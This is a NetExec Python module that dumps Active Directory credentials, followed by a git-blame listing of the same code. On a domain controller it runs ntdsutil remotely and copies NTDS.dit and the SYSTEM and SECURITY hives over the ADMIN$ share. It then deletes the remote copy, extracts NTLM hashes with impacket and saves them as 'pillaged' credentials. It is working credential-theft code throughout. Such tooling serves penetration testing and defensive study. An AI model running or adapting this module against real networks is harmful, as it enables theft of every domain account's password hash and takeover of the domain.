NetExec/nxc/modules/ntdsutil.py

import os
import shutil
import tempfile
import time

from impacket.examples.secretsdump import LocalOperations, NTDSHashes

from nxc.helpers.logger import highlight
from nxc.helpers.misc import validate_ntlm


class NXCModule:
    """
    Dump NTDS with ntdsutil
    Module by @zblurx

    """

    name = "ntdsutil"
    description = "Dump NTDS with ntdsutil"
    supported_protocols = ["smb"]
    opsec_safe = True
    multiple_hosts = False

    def options(self, context, module_options):
        """
        Dump NTDS with ntdsutil
        Module by @zblurx

        DIR_RESULT  Local dir to write ntds dump. If specified, the local dump will not be deleted after parsing
        """
        self.share = "ADMIN$"
        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.tmp_share = self.tmp_dir.split("C:\\Windows\\")[1]
        self.dump_location = str(time.time())[:9]
        self.dir_result = self.dir_result = tempfile.mkdtemp()
        self.no_delete = False

        if "DIR_RESULT" in module_options:
            self.dir_result = os.path.abspath(module_options["DIR_RESULT"])
            self.no_delete = True

    def on_admin_login(self, context, connection):
        command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location)
        context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location))
        context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")
        context.log.debug("Executing command {}".format(command))
        p = connection.execute(command, True)
        context.log.debug(p)
        if "success" in p:
            context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location))
        else:
            context.log.fail("Error while dumping NTDS")
            return

        os.makedirs(self.dir_result, exist_ok=True)
        os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)
        os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)

        context.log.display("Copying NTDS dump to %s" % self.dir_result)
        context.log.debug("Copy ntds.dit to host")
        with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:
            try:
                connection.conn.getFile(
                    self.share,
                    self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit",
                    dump_file.write,
                )
                context.log.debug("Copied ntds.dit file")
            except Exception as e:
                context.log.fail("Error while get ntds.dit file: {}".format(e))

        context.log.debug("Copy SYSTEM to host")
        with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:
            try:
                connection.conn.getFile(
                    self.share,
                    self.tmp_share + self.dump_location + "\\" + "registry\\SYSTEM",
                    dump_file.write,
                )
                context.log.debug("Copied SYSTEM file")
            except Exception as e:
                context.log.fail("Error while get SYSTEM file: {}".format(e))

        context.log.debug("Copy SECURITY to host")
        with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:
            try:
                connection.conn.getFile(
                    self.share,
                    self.tmp_share + self.dump_location + "\\" + "registry\\SECURITY",
                    dump_file.write,
                )
                context.log.debug("Copied SECURITY file")
            except Exception as e:
                context.log.fail("Error while get SECURITY file: {}".format(e))
        context.log.display("NTDS dump copied to %s" % self.dir_result)
        try:
            command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location)
            p = connection.execute(command, True)
            context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location))
        except Exception as e:
            context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e))

        localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result)
        bootKey = localOperations.getBootKey()
        noLMHash = localOperations.checkNoLMHashPolicy()

        host_id = context.db.get_hosts(filter_term=connection.host)[0][0]

        def add_ntds_hash(ntds_hash, host_id):
            add_ntds_hash.ntds_hashes += 1
            if context.enabled:
                if "Enabled" in ntds_hash:
                    ntds_hash = ntds_hash.split(" ")[0]
                    context.log.highlight(ntds_hash)
            else:
                ntds_hash = ntds_hash.split(" ")[0]
                context.log.highlight(ntds_hash)
            if ntds_hash.find("$") == -1:
                if ntds_hash.find("\\") != -1:
                    domain, hash = ntds_hash.split("\\")
                else:
                    domain = connection.domain
                    hash = ntds_hash

                try:
                    username, _, lmhash, nthash, _, _, _ = hash.split(":")
                    parsed_hash = ":".join((lmhash, nthash))
                    if validate_ntlm(parsed_hash):
                        context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
                        add_ntds_hash.added_to_db += 1
                        return
                    raise
                except:
                    context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)")
            else:
                context.log.debug("Dumped hash is a computer account, not adding to db")

        add_ntds_hash.ntds_hashes = 0
        add_ntds_hash.added_to_db = 0

        NTDS = NTDSHashes(
            "%s/Active Directory/ntds.dit" % self.dir_result,
            bootKey,
            isRemote=False,
            history=False,
            noLMHash=noLMHash,
            remoteOps=None,
            useVSSMethod=True,
            justNTLM=True,
            pwdLastSet=False,
            resumeSession=None,
            outputFileName=connection.output_filename,
            justUser=None,
            printUserStatus=True,
            perSecretCallback=lambda secretType, secret: add_ntds_hash(secret, host_id),
        )

        try:
            context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...")
            NTDS.dump()
            context.log.success(
                "Dumped {} NTDS hashes to {} of which {} were added to the database".format(
                    highlight(add_ntds_hash.ntds_hashes),
                    connection.output_filename + ".ntds",
                    highlight(add_ntds_hash.added_to_db),
                )
            )
            context.log.display("To extract only enabled accounts from the output file, run the following command: ")
            context.log.display("grep -iv disabled {} | cut -d ':' -f1".format(connection.output_filename + ".ntds"))
        except Exception as e:
            context.log.fail(e)

        NTDS.finish()

        if self.no_delete:
            context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result)
            context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result))
        else:
            shutil.rmtree(self.dir_result)
add ntdsutil module 2023-03-22 09:35:18 +00:00			`import os`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`import shutil`
			`import tempfile`
add random outputdir 2023-03-22 09:45:02 +00:00			`import time`
add ntdsutil module 2023-03-22 09:35:18 +00:00
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`from impacket.examples.secretsdump import LocalOperations, NTDSHashes`

rename folders, files, functions, classes, etc to NetExec/nxc 2023-09-14 21:07:15 +00:00			`from nxc.helpers.logger import highlight`
			`from nxc.helpers.misc import validate_ntlm`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00
black formating 2023-05-02 15:17:59 +00:00
Rename Module Classname to match python convention 2023-09-17 20:20:40 +00:00			`class NXCModule:`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
black formating 2023-05-02 15:17:59 +00:00			`Dump NTDS with ntdsutil`
			`Module by @zblurx`
add ntdsutil module 2023-03-22 09:35:18 +00:00
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
black formating 2023-05-02 15:17:59 +00:00
			`name = "ntdsutil"`
			`description = "Dump NTDS with ntdsutil"`
			`supported_protocols = ["smb"]`
			`opsec_safe = True`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`multiple_hosts = False`

			`def options(self, context, module_options):`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`Dump NTDS with ntdsutil`
			`Module by @zblurx`

finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`DIR_RESULT Local dir to write ntds dump. If specified, the local dump will not be deleted after parsing`
fix(docs): replace single quote doc strings with double quote 2023-04-07 16:40:48 +00:00			`"""`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`self.share = "ADMIN$"`
			`self.tmp_dir = "C:\\Windows\\Temp\\"`
			`self.tmp_share = self.tmp_dir.split("C:\\Windows\\")[1]`
add random outputdir 2023-03-22 09:45:02 +00:00			`self.dump_location = str(time.time())[:9]`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`self.dir_result = self.dir_result = tempfile.mkdtemp()`
			`self.no_delete = False`
add ntdsutil module 2023-03-22 09:35:18 +00:00
black formating 2023-05-02 15:17:59 +00:00			`if "DIR_RESULT" in module_options:`
			`self.dir_result = os.path.abspath(module_options["DIR_RESULT"])`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`self.no_delete = True`
add ntdsutil module 2023-03-22 09:35:18 +00:00
			`def on_admin_login(self, context, connection):`
black v2 formating 2023-05-08 18:39:36 +00:00			`command = "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full %s%s' q q\"" % (self.tmp_dir, self.dump_location)`
			`context.log.display("Dumping ntds with ntdsutil.exe to %s%s" % (self.tmp_dir, self.dump_location))`
			`context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...")`
black formating 2023-05-02 15:17:59 +00:00			`context.log.debug("Executing command {}".format(command))`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`p = connection.execute(command, True)`
			`context.log.debug(p)`
black formating 2023-05-02 15:17:59 +00:00			`if "success" in p:`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.success("NTDS.dit dumped to %s%s" % (self.tmp_dir, self.dump_location))`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`else:`
module switch to fail instead of error function 2023-04-21 10:17:50 +00:00			`context.log.fail("Error while dumping NTDS")`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`return`

finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`os.makedirs(self.dir_result, exist_ok=True)`
black formating 2023-05-02 15:17:59 +00:00			`os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True)`
			`os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True)`
add ntdsutil module 2023-03-22 09:35:18 +00:00
add config.py, update logging, and more 2023-04-06 00:09:07 +00:00			`context.log.display("Copying NTDS dump to %s" % self.dir_result)`
black formating 2023-05-02 15:17:59 +00:00			`context.log.debug("Copy ntds.dit to host")`
black v2 formating 2023-05-08 18:39:36 +00:00			`with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file:`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`try:`
black formating 2023-05-02 15:17:59 +00:00			`connection.conn.getFile(`
			`self.share,`
black v2 formating 2023-05-08 18:39:36 +00:00			`self.tmp_share + self.dump_location + "\\" + "Active Directory\\ntds.dit",`
black formating 2023-05-02 15:17:59 +00:00			`dump_file.write,`
			`)`
			`context.log.debug("Copied ntds.dit file")`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`except Exception as e:`
black formating 2023-05-02 15:17:59 +00:00			`context.log.fail("Error while get ntds.dit file: {}".format(e))`
add ntdsutil module 2023-03-22 09:35:18 +00:00
black formating 2023-05-02 15:17:59 +00:00			`context.log.debug("Copy SYSTEM to host")`
black v2 formating 2023-05-08 18:39:36 +00:00			`with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file:`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`try:`
black formating 2023-05-02 15:17:59 +00:00			`connection.conn.getFile(`
			`self.share,`
			`self.tmp_share + self.dump_location + "\\" + "registry\\SYSTEM",`
			`dump_file.write,`
			`)`
			`context.log.debug("Copied SYSTEM file")`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`except Exception as e:`
black formating 2023-05-02 15:17:59 +00:00			`context.log.fail("Error while get SYSTEM file: {}".format(e))`
add ntdsutil module 2023-03-22 09:35:18 +00:00
black formating 2023-05-02 15:17:59 +00:00			`context.log.debug("Copy SECURITY to host")`
black v2 formating 2023-05-08 18:39:36 +00:00			`with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file:`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`try:`
black formating 2023-05-02 15:17:59 +00:00			`connection.conn.getFile(`
			`self.share,`
			`self.tmp_share + self.dump_location + "\\" + "registry\\SECURITY",`
			`dump_file.write,`
			`)`
			`context.log.debug("Copied SECURITY file")`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`except Exception as e:`
black formating 2023-05-02 15:17:59 +00:00			`context.log.fail("Error while get SECURITY file: {}".format(e))`
add config.py, update logging, and more 2023-04-06 00:09:07 +00:00			`context.log.display("NTDS dump copied to %s" % self.dir_result)`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`try:`
			`command = "rmdir /s /q %s%s" % (self.tmp_dir, self.dump_location)`
			`p = connection.execute(command, True)`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.success("Deleted %s%s remote dump directory" % (self.tmp_dir, self.dump_location))`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`except Exception as e:`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.fail("Error deleting {} remote directory on share {}: {}".format(self.dump_location, self.share, e))`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00
			`localOperations = LocalOperations("%s/registry/SYSTEM" % self.dir_result)`
			`bootKey = localOperations.getBootKey()`
			`noLMHash = localOperations.checkNoLMHashPolicy()`

update ntdsutil db interactions 2023-03-23 09:24:57 +00:00			`host_id = context.db.get_hosts(filter_term=connection.host)[0][0]`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00
			`def add_ntds_hash(ntds_hash, host_id):`
			`add_ntds_hash.ntds_hashes += 1`
			`if context.enabled:`
			`if "Enabled" in ntds_hash:`
			`ntds_hash = ntds_hash.split(" ")[0]`
			`context.log.highlight(ntds_hash)`
			`else:`
			`ntds_hash = ntds_hash.split(" ")[0]`
			`context.log.highlight(ntds_hash)`
black formating 2023-05-02 15:17:59 +00:00			`if ntds_hash.find("$") == -1:`
			`if ntds_hash.find("\\") != -1:`
			`domain, hash = ntds_hash.split("\\")`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`else:`
			`domain = connection.domain`
			`hash = ntds_hash`

			`try:`
black formating 2023-05-02 15:17:59 +00:00			`username, _, lmhash, nthash, _, _, _ = hash.split(":")`
			`parsed_hash = ":".join((lmhash, nthash))`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`if validate_ntlm(parsed_hash):`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`add_ntds_hash.added_to_db += 1`
			`return`
			`raise`
			`except:`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.debug("Dumped hash is not NTLM, not adding to db for now ;)")`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`else:`
			`context.log.debug("Dumped hash is a computer account, not adding to db")`
black formating 2023-05-02 15:17:59 +00:00
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`add_ntds_hash.ntds_hashes = 0`
			`add_ntds_hash.added_to_db = 0`

black formating 2023-05-02 15:17:59 +00:00			`NTDS = NTDSHashes(`
			`"%s/Active Directory/ntds.dit" % self.dir_result,`
			`bootKey,`
			`isRemote=False,`
			`history=False,`
			`noLMHash=noLMHash,`
			`remoteOps=None,`
			`useVSSMethod=True,`
			`justNTLM=True,`
			`pwdLastSet=False,`
			`resumeSession=None,`
			`outputFileName=connection.output_filename,`
			`justUser=None,`
			`printUserStatus=True,`
			`perSecretCallback=lambda secretType, secret: add_ntds_hash(secret, host_id),`
			`)`

finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`try:`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.success("Dumping the NTDS, this could take a while so go grab a redbull...")`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`NTDS.dump()`
black formating 2023-05-02 15:17:59 +00:00			`context.log.success(`
			`"Dumped {} NTDS hashes to {} of which {} were added to the database".format(`
			`highlight(add_ntds_hash.ntds_hashes),`
			`connection.output_filename + ".ntds",`
			`highlight(add_ntds_hash.added_to_db),`
			`)`
			`)`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.display("To extract only enabled accounts from the output file, run the following command: ")`
			`context.log.display("grep -iv disabled {} \| cut -d ':' -f1".format(connection.output_filename + ".ntds"))`
add ntdsutil module 2023-03-22 09:35:18 +00:00			`except Exception as e:`
module switch to fail instead of error function 2023-04-21 10:17:50 +00:00			`context.log.fail(e)`
add ntdsutil module 2023-03-22 09:35:18 +00:00
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`NTDS.finish()`
black formating 2023-05-02 15:17:59 +00:00
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`if self.no_delete:`
black v2 formating 2023-05-08 18:39:36 +00:00			`context.log.display("Raw NTDS dump copied to %s, parse it with:" % self.dir_result)`
			`context.log.display('secretsdump.py -system %s/registry/SYSTEM -security %s/registry/SECURITY -ntds "%s/Active Directory/ntds.dit" LOCAL' % (self.dir_result, self.dir_result, self.dir_result))`
finish ntdsutil.py module 2023-03-22 11:40:04 +00:00			`else:`
black formating 2023-05-02 15:17:59 +00:00			`shutil.rmtree(self.dir_result)`